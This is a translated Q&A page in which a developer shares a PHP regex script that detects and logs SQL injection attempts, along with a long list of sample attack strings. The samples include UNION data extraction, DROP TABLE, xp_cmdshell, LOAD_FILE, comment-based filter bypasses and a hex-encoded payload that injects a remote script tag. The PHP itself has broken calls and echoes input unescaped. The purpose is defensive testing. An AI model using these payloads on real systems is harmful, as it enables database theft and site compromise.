如何解决SQL注入检测-已编译正则表达式…寻找测试注入
|| 上周末,我整理了一个正则表达式列表,以检查GET,POST和COOKIE super globals中的sql注入。众所周知,它们在检测是否发现sql注入方面非常有效。我已经在各种sql注入文档中运行了很多注入攻击,但是我正在寻找可能无法解决的更复杂的注入攻击。 我很清楚最好的防御方法是验证/清除输入和参数化查询,但是此脚本并非旨在保护,而是仅记录潜在的攻击。我也知道,这会在各种情况下产生误报,但由于它只是用于记录日志,因此这并不是什么大问题。 检测脚本如下。<?php
testArray($_GET);
testArray($_POST);
testArray($_COOKIE);
function testArray($array)
{
foreach ($array as $name => $value)
{
if(is_array($value) === true)
{
testArray($value);
}
else
{
testHelper($value);
}
}
}
function testHelper($varvalue)
{
$total = test($varvalue);
echo \'<h3 style=\"\'.($total > 0 ? \'color:red;\' : \'color:green;\').\'\">\'.nl2br($varvalue).\'</h3>\';
echo \'<span style=\"\'.($total > 0 ? \'color:red;\' : \'color:green;\').\'\">\';
echo \'total = \'.$total.\'
\';
echo \'</span><br />\';
}
function test($varvalue,$_comment_loop=false)
{
$total = 0;
$varvalue_orig = $varvalue;
$quote_pattern = \'\\%27|\\\'|\\%22|\\\"|\\%60|`\';
// detect base64 encoding
if(preg_match(\'/^[a-zA-Z0-9\\/+]*={0,2}$/\',$varvalue) > 0 && base64_decode($varvalue) !== false)
{
$varvalue = base64_decode($varvalue);
}
// detect and remove comments
if(preg_match(\'!/\\*.*?\\*/!s\',$varvalue) > 0)
{
if($_comment_loop === false)
{
$total += test($varvalue_orig,true);
$varvalue = preg_replace(\'!/\\*.*?\\*/!s\',\'\',$varvalue);
}
else
{
$varvalue = preg_replace(\'!/\\*.*?\\*/!s\',\' \',$varvalue);
}
$varvalue = preg_replace(\'/\\n\\s*\\n/\',\"\\n\",$varvalue);
}
$varvalue = preg_replace(\'/((\\-\\-|\\#)([^\\\\n]*))\\\\n/si\',$varvalue);
// detect and replace hex encoding
// detect and replace decimal encodings
if(preg_match_all(\'/&#x([0-9]{2});/\',$varvalue,$matches) > 0 || preg_match_all(\'/&#([0-9]{2})/\',$matches) > 0)
{
// replace numeric entities
$varvalue = preg_replace(\'/&#x([0-9a-f]{2});?/ei\',\'chr(hexdec(\"\\\\1\"))\',$varvalue);
$varvalue = preg_replace(\'/&#([0-9]{2});?/e\',\'chr(\"\\\\1\")\',$varvalue);
// replace literal entities
$trans_tbl = get_html_translation_table(HTML_ENTITIES);
$trans_tbl = array_flip($trans_tbl);
$varvalue = strtr($varvalue,$trans_tbl);
}
$and_pattern = \'(\\%41|a|\\%61)(\\%4e|n|%6e)(\\%44|d|\\%64)\';
$or_pattern = \'(\\%6F|o|\\%4F)(\\%72|r|\\%52)\';
$equal_pattern = \'(\\%3D|=)\';
$regexes = array(
\'/(\\-\\-|\\#|\\/\\*)\\s*$/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\\d+)\\s*\'.$equal_pattern.\'\\s*\\\\4\\s*/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\'.$quote_pattern.\')(\\d+)\\\\4\\s*\'.$equal_pattern.\'\\s*\\\\5\\s*/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\\d+)\\s*\'.$equal_pattern.\'\\s*(\'.$quote_pattern.\')\\\\4\\\\6?/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\'.$quote_pattern.\')?(\\d+)\\\\4?/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\'.$quote_pattern.\')([^\\\\4]*)\\\\4\\\\5\\s*\'.$equal_pattern.\'\\s*(\'.$quote_pattern.\')/si\',\'/(((\'.$quote_pattern.\')\\s*)|\\s+)\'.$or_pattern.\'\\s+([a-z_]+)/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s+([a-z_]+)\\s*\'.$equal_pattern.\'\\s*(d+)/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s+([a-z_]+)\\s*\'.$equal_pattern.\'\\s*(\'.$quote_pattern.\')/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\'.$quote_pattern.\')([^\\\\4]+)\\\\4\\s*\'.$equal_pattern.\'\\s*([a-z_]+)/si\',\'/(\'.$quote_pattern.\')?\\s*\'.$or_pattern.\'\\s*(\'.$quote_pattern.\')([^\\\\4]+)\\\\4\\s*\'.$equal_pattern.\'\\s*(\'.$quote_pattern.\')/si\',\'/(\'.$quote_pattern.\')?\\s*\\)\\s*\'.$or_pattern.\'\\s*\\(\\s*(\'.$quote_pattern.\')([^\\\\4]+)\\\\4\\s*\'.$equal_pattern.\'\\s*(\'.$quote_pattern.\')/si\',\'/(\'.$quote_pattern.\'|\\d)?(;|%20|\\s)*(union|select|insert|update|delete|drop|alter|create|show|truncate|load_file|exec|concat|benchmark)((\\s+)|\\s*\\()/ix\',\'/from(\\s*)information_schema.tables/ix\',);
foreach ($regexes as $regex)
{
$total += preg_match($regex,$varvalue);
}
return $total;
}
对于懒惰的人...这里是一些示例攻击。
testArray(array(
\"\' or 1=1--\",\"\' or 1-- \",\"\' or 1-- adasd \",\"\' or 1\",\"\\\" or \'1\'\",\"\' or 1=1--\",\"or 1=1--\",\"\' OR \'\'=\'\",\"\' or \'a\'=\'a\",\'\" or \"a\"=\"a\',\"\') or (\'a\'=\'a\",\"\'; exec master..xp_cmdshell \'ping 10.10.1.2\'--\",\"\'; EXEC master..sp_makewebtask \\\"\\\\10.10.1.3\\share\\output.html\\\",\\\"SELECT * FROM INFORMATION_SCHEMA.TABLES\\\"\",\"10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--\",\"10 UNION SELECT TOP 1 password FROM admin_login where login_name=\'neo\'--\",\"\' OR EXISTS(SELECT * FROM users WHERE name=\'jake\' AND password LIKE \'%w%\') AND \'\'=\'\",\"\' OR EXISTS(SELECT * FROM users WHERE name=\'jake\' AND password LIKE \'__w%\') AND \'\'=\'\",\"\'OR\'\'=\'\",\"\' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE \'%j%\') AND \'\'=\'\",\"\' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=\'test\' AND TABLE_NAME=\'one\') AND \'\'=\'\",\"\' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE \'%j%\')>1 AND \'\'=\'\",\"\' OR (SELECT COUNT(*) FROM users)>10 AND \'\'=\'\",\"\' OR EXISTS(SELECT * FROM users WHERE name LIKE \'%r%\') AND \'\'=\'\",\"\' OR EXISTS(SELECT * FROM users WHERE name!=\'jake\' AND name LIKE \'%a%\') AND \'\'=\'\",\"\' or \'1\'=\'1\' -- \'\",\"\' or \'1\'=\'1\' ({ \'\",\"\' or \'1\'=\'1\' /* \'\",\"1;DROP TABLE `users`\",\"10;DROP members --\",\"x\' AND email IS NULL; --\",\"x\' AND 1=(SELECT COUNT(*) FROM tabname); --\",\"x\' AND members.email IS NULL; --\",\"x\';
INSERT INTO members (\'email\',\'passwd\',\'login_id\',\'full_name\')
VALUES (\'steve@unixwiz.net\',\'hello\',\'steve\',\'Steve Friedl\');--\",\"x\';
UPDATE members
SET email = \'steve@unixwiz.net\'
WHERE email = \'bob@example.com\",\"23 OR 1=1\",\"23\' OR 1=1\",\"\\\'\'; DROP TABLE users; --\",\"Bill O\'\'Reilly\",\"the new album\'\\\"s and totally shit....get back to glasgow and write some good tunes.\",\"the new album\'s and totally shit....get back to glasgow and write some good tune\'s.\",\"the new album\'s and totally shit.....\",\"lee crossan\",\"\\\"123\\\"\",\"111 /*This is my comment...*/UN/*Can You*/IO/*Find It*/N/**/ S/**/E/*
*/LE/*Another comment to*/CT/*Find. Can you dig*//*it*/*\",\"1 UNION SELECT ALL FROM WHERE\",\"1 UNION SELECT ALL FROM WHERE\",\"71985\' OR 1 = 1\",\"71985 OR 1 = 1\",\"71985 OR 1 =1\",\"71985 OR 1=1\",\"71985 OR 1= 1\",\"71985\' OR \'1\'= 1\",\"71985 OR \'1\'= 1\",\"71985 OR 1= \'1\'\",\"71985 OR \'5555\",\"71985 OR \'\' = \'\",\"71985 OR \'\' = \\\"\",\"71985 OR \' \' = \\\" \",\"71985 OR \'_\' = \\\"_\",\"71985 OR user_id\",\"71985 OR user_id=123\",\"71985 OR user_id =123\",\"71985 OR user_id =\'asd\",\"71985 OR \'asd\' = user_id\",\"71985 OR user_id = user_id\",\"71985 OR \'a\' = \'a\",\"71985 OR \'a\' = \'\",\"71985 OR \'a\' = \'a\';--\",\"71985 OR \'a\' = \'a\';\",\"preg_match(\'/^[a-zA-Z0-9\\/+]*={0,\\$varvalue) > 0 && base64_decode(\\$varvalue) !== false)\",\'1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- \',\'ar/news/global/2008/12/16/radio_1_christmas_show\',\'202534599.1295899315.1.1.utmcsr=xxx.xxx.de|utmccn=(referral)|utmcmd=referral|utmcct=/xxx/xxx/blog/dc11656b/\',\'Aptly describes how a close-minded society can make a person feel. To think that this same society would target young adolescents is unconscionable. Thanks for the song.\',\'; SELECT(xxxx) \',\'Aptly describes how a close-minded society can make a person feel. Thanks for the song.\',\"\';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);\",\'; SELECT LOAD_FILE(0x633A5C626F6F742E696E69)\',\'SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))\',\'SELECT CHAR(75)+CHAR(76)+CHAR(77)\',\'SELECT login || \\\'-\\\' || password FROM members\',\'DROP/*comment*/sampletable\',\';DR/**/OP/*bypass blacklisting*/sampletable\',\';DR/**/OP/*bypass blacklisting*/ sampletable\',\';DR/*
*/OP/*bypass blacklisting*/ sampletable\',\';DR--
OP--
sampletable\',\';DROP-- eranious data
TABLE --
sampletable\',\'1;SELECT/*avoid-spaces*/password/**/FROM/**/Members \',\'SELECT /*!32302 1/0,*/ 1 FROM tablename\',\"\' UNION SELECT 1,\'anotheruser\',\'doesnt matter\',1--\",\"1234 \' AND 1=0 UNION ALL SELECT \'admin\',\'81dc9bdb52d04dc20036dbd8313ed055\",\"-1 UNION ALL SELECT null,null,NULL,convert(image,1),NULl,NULL-- \",\"11223344) UNION SELECT NULL,NULL WHERE 1=2 –- \",\"11223344) UNION SELECT 1,’2’,\",0 UNION ALL SELECT 1,\'x\'/*,10 ;\",\"\';shutdown --\",\"(SELECT id FROM sysobjects WHERE name = \'tablenameforcolumnnames\')\",\"BENCHMARK(howmanytimes,do this)\",\"BENCHMARK (howmanytimes,\"1 union select benchmark(500000,sha1 (0x414141)),1\",\"this is not a attack but --
plain text comment that someone could write.
\",\"what about this; or that or them!\",));
因此,主要问题是-您是否可以通过该测试函数进行sql注入-如果是这样-它是什么?
解决方法
您可能想签出PHPIDS测试套件,例如这一套
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。